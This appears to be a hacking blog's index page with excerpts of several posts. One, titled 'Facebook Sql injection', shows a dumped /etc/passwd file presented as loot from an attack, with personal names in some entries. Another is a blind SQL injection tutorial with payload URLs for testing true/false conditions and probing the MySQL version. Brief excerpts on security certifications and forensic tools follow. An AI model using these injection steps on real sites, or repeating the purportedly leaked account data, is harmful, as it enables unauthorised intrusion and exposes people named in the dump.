ROHIT PATEL

Facebook Sql injection       Injection Include :   root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh user:x:1000:1000:user,,,:/home/user:/bin/bash sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin todd:x:1001:1001:Todd Weaver,,,:/home/todd:/bin/bash jeff:x:1002:1002:Jeff Reifman,,,:/home/jeff:/bin/ba...

Blind SQL Injection tutorial ................................................................................................................................ Let's start with advanced stuff. I will be using our example http://www.site.com/news.php?id=5 when we execute this, we see some page and articles on that page, pictures etc... then when we want to test it for blind sql injection attack http://www.site.com/news.php?id=5 and 1=1 <--- this is always true and the page loads normally, that's ok. now the real test http://www.site.com/news.php?id=5 and 1=2 <--- this is false so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection. 1) Get the MySQL version to get the version in blind attack we use substring i.e http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4 this should return TRUE if the version of MySQL is 4. replace 4 with 5, and if query return TRUE then th...

Top 5 IT Security Certifications For 2011     Top 5 IT Security Certifications for 2011    In today’s tough IT market having a security certification that recruiters want can mean the difference between getting that next job or not. “A certification today is like a college degree,” says Grad Summers, Americas leader for information security program management services at Ernst & Young. “You may not hire a candidate just because they have one, but it is something that you come to expect in this field.” Here are the top five security certifications for 2011 , compiled by scanning job boards and interviewing IT security recruiters and employers: Vendor Certifications A growing need for hands-on network engineers, along with social computing and Web 2.0 technology, has propelled network security even further. Vendor certifications including Cisco’s Certified Network Associate Certification ( CCNA ), Microsoft’s Certified Systems Engin...

Top 5 Hack Tools for Hackers to Investigate Computer System Top 5 Hack Tools for Hackers to Investigate Computer System List of top 5 hack tools for hackers to Inverstigate or Forensic Computer system or PC : 1. Live View 2. Start up List 3. Open Files View 4. Wireshark 5. Helix 3 Working of above tools stepwise: 1. Live View Live View is an open source utility that creates a virtual machine of the existing system. Live View creates a virtual disk out of the system that allows you to then safely investigate a copy of the system without interfering with anything installed. So you can easily investigate your system virtually without affecting the original system. Now restart you PC for further investigations and tools to use. You can download Live View for free here ( Click here to download ). 2. Start up List Now you have a virtual copy of your system and now why you are waiting let's start investigating PC. So download th...